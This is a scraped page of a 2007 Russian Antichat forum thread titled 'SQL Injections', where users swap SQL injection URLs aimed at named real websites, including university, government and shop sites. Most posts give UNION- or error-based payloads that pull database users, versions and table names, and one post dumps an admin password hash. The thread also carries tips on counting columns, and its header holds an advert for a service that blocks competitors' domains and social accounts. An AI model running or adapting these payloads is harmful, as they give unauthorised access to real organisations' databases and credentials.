Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 229 из 1242

229

Опции темы

Поиск в этой теме

Опции просмотра

#2281

26.05.2007, 00:34

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Код:

http://www.worldbrand.pl/index.php?id=-1+union+select+1,2,3,concat(login,char(58),pass),5,6+from+worldbrand.users+limit+0,1/*

#2282

26.05.2007, 00:39

NighSh

Новичок

Регистрация: 20.11.2006

Сообщений: 19

Провел на форуме:
159979

Репутация: 1

Код:

http://sonyericsson-club.ru/news/phone-9999+union+select+1,2,3,44,concat(user(),0x3a,version(),0x3a,database()),6.html

Поля не смог подобрать... если кто подберет отпишите. Просто интересно стоит оно того или нет ) А то это моя первая скуля тут )))

#2283

26.05.2007, 02:27

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

http://schwein.ru

Код:

http://schwein.ru/news/index.php?page=single&rec=-1%20union%20select%200,version(),user(),3,database(),5/*

Mssql

#2284

26.05.2007, 03:40

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Mssql

Arizona State University
www.asu.edu

Код:

http://knowledge.wpcarey.asu.edu/index.cfm?fa=viewCat&CID=-1+or+1=(select+system_user)--

user: asu_user
db_name: ASU_DB
version: Microsoft SQL Server 2005 - 9.00.3159.00
Таблица и столбцы вываливаются в ошибке

#2285

26.05.2007, 09:11

V.I.P

Познающий

Регистрация: 06.04.2007

Сообщений: 77

Провел на форуме:
1062869

Репутация: 136

Отправить сообщение для V.I.P с помощью ICQ

http://www.lzsafety.gov.cn/news-print.php?id='

PHP код:


		
			
http://www.lzsafety.gov.cn/news-print.php?id='+union+select+table_name,2,3,4+from+information_schema.tables+limit+107,1/*

PHP код:


		
			
http://www.lzsafety.gov.cn/news-print.php?id='+union+select+column_name,2,3,4+from+information_schema.columns/*

PHP код:


		
			
http://www.lzsafety.gov.cn/news-print.php?id='+union+select+concat(user,char(58),pass),2,3,4+from+admin/*

root:*FA450863BE8C1DF3DCCE22B20EB630A7A55CCA39

#2286

26.05.2007, 12:50

Ky3bMu4

Постоянный

Регистрация: 03.02.2007

Сообщений: 520

Провел на форуме:
1777536

Репутация: 932

Отправить сообщение для Ky3bMu4 с помощью ICQ

Партия .edu

Код:

http://gopanthers.fit.edu/sports_info/view.php?id=-11+union+select+1,2,3,4/*
http://www.montana.edu/cpa/news/nwview.php?article=-4862+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22,23/*

Не подобрал:

Код:

http://bchs.uh.edu/news.php?news=-68+union+select+1/*
http://www.metropolitan.edu/news/newsdetail.php?id=-231+union+select+1,2,3,4/*
http://www.umtri.umich.edu/news.php?id=1455+union+select+1,2,3/*
http://www.mlml.calstate.edu/news/newsdetail.php?nid=-34+union+select+1,2,3,4,5,6,7,8,9/*

#2287

26.05.2007, 13:10

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.taksa-shop.ru/index.php?id=-1+union+select+1,password+from+users/*

limit в помощью. Ответ от БД сморим в теги <title></title>

#2288

26.05.2007, 14:04

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

http://www.lada-auto.ru
Type: Oracle

Код:

http://www.lada-auto.ru/cgi-bin/news.pl?id=-1'

#2289

26.05.2007, 14:31

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

gov.tr

Код:

http://www.karabuk.gov.tr/giris/haber.php?id=582345678&kategori=-1'

Код HTML:

http://www.casgem.gov.tr/duyuru.php?uid=-13245'%20union%20select%200,user(),version(),database(),4/*&view=1

uname : casgemuser2@localhost
db: casgemdb2
ver: 4.1.20

#2290

26.05.2007, 18:22

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

to Кузьмич

Цитата:

http://www.metropolitan.edu/news/newsdetail.php?id=-231+union+select+1,2,3,4/*

Третья версия mysql по-этому и нет union, надо перебором фигачить

Цитата:

http://www.mlml.calstate.edu/news/newsdetail.php?nid=-34+union+select+1,2,3,4,5,6,7/*

Здесь 7 столбцов, 5 принтабельный смотри в title

Последний раз редактировалось [53x]Shadow; 26.05.2007 в 18:36..

Страница 229 из 1242

229

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход